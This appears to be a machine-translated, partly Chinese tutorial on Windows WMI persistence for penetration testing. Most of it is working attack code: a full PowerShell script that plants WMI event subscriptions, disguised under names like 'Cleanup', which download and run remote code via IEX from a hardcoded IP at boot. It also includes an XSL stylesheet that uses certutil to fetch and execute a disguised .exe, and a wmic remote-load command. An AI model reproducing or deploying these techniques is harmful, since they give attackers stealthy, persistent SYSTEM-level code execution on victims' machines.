0x01 Foreword
WMIC extended WMI (Windows Management Instrumentation, Windows management tools) , provides support for command line interfaces and batch command scripts to perform system administration.
In 2015 blackhat General Assembly on Matt Graeber describes a non-wmi file is to use the back door.
WMI can be described as a set of methods and functions to manage Windows systems. We may take it as API to communicate with each other with the Windows system. WMI value of penetration testing is that it does not need to download and install, because WMI is a Windows system comes with features. And the entire operation takes place in the computer's memory, without leaving any traces.
0x02 wmi common use
Information retrieval system
Software retrieval system installed
wmic product list brief |more
wmic service list brief |more
wmic startup list brief |more
Search computer domain controller
wmic ntdomain list brief
The following is a WMI-Persistence.ps1 script, on a code is very simple, three functions are inserted into the designated event wmi, wmi delete the specified event, and then query wmi events need to change the place, that is bold remote payload address,
Of course, you can also change the name of the event you want, but do not change even too much to complain so much, at first glance not out
# function Install-Persistence{ $Payload = "<strong>((new-object net.webclient).downloadstring('http://192.168.3.68:80/logo.gif'))</strong>" $EventFilterName = 'Cleanup' $EventConsumerName = 'DataCleanup' $finalPayload = "<strong>powershell.exe -nop -c `"IEX $Payload`"</strong>" # Create event filter $EventFilterArgs = @{ EventNamespace = 'root/cimv2' Name = $EventFilterName Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325" QueryLanguage = 'WQL' } $Filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments $EventFilterArgs # Create CommandLineEventConsumer $CommandLineConsumerArgs = @{ Name = $EventConsumerName CommandLineTemplate = $finalPayload } $Consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments $CommandLineConsumerArgs # Create FilterToConsumerBinding $FilterToConsumerArgs = @{ Filter = $Filter Consumer = $Consumer } $FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments $FilterToConsumerArgs #Confirm the Event Filter was created $EventCheck = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = '$EventFilterName'" if ($EventCheck -ne $null) { Write-Host "Event Filter $EventFilterName successfully written to host" } #Confirm the Event Consumer was created $ConsumerCheck = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = '$EventConsumerName'" if ($ConsumerCheck -ne $null) { Write-Host "Event Consumer $EventConsumerName successfully written to host" } #Confirm the FiltertoConsumer was created $BindingCheck = Get-WmiObject -Namespace root/subscription -Class __FilterToConsumerBinding -Filter "Filter = ""__eventfilter.name='$EventFilterName'""" if ($BindingCheck -ne $null){ Write-Host "Filter To Consumer Binding successfully written to host" } } function Remove-Persistence{ $EventFilterName = 'Cleanup' $EventConsumerName = 'DataCleanup' # Clean up Code - Comment this code out when you are installing persistence otherwise it will $EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = '$EventConsumerName'" $EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = '$EventFilterName'" $FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding" $FilterConsumerBindingToCleanup | Remove-WmiObject $EventConsumerToCleanup | Remove-WmiObject $EventFilterToCleanup | Remove-WmiObject } function Check-WMI{ Write-Host "Showing All Root Event Filters"Get-WmiObject -Namespace root/subscription -Class __EventFilter Write-Host "Showing All CommandLine Event Consumers" Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer Write-Host "Showing All Filter to Consumer Bindings" Get-WmiObject -Namespace root/subscription -Class __FilterToConsumerBinding }
And then began to insert event, once the normal insertion is successful, when the target again to restart the system administrator [administrator] normal login, wait a moment [2016 may have to wait a little while] when the system is in the background polling event to our payload , will be triggered execution
PS > Import-Module .\WMI-Persistence.ps1 PS > Install-Persistence PS > Check-WMI
Subsequently, beacon system privileges normally bounce
We can also use the remote loading of wmi
<?xml version=``'1.0'``?> <stylesheet xmlns=``"http://www.w3.org/1999/XSL/Transform" xmlns:ms=``"urn:schemas-microsoft-com:xslt" xmlns:user=``"placeholder" version=``"1.0"``> <output method=``"text"``/> ``<ms:script implements-prefix=``"user" language=``"JScript"``> ``<![CDATA[ ``var r = ``new ActiveXObject(``"WScript.Shell"``).Run(``"cmd.exe /c certutil -urlcache -split -f <strong>http://*/load.jpg</strong> %temp%/load.exe & %temp%/load.exe & certutil.exe -urlcache -split -f http://*/load.jpg delete"``,0); ``]]> </ms:script> </stylesheet>
修改WMI-Persistence.ps1 脚本,只需把payload部分换下就行,别的不需要动
wmic os get /FORMAT:"http://192.168.3.68:80/wmi.xsl"
powershell -exec bypass PS > Import-Module .\WMI-Persistence.ps1 PS > Install-Persistence PS > Check-WMI PS > Remove-Persistence 用完以后务必要记得随手删掉
也可以达到自定义上线的目的。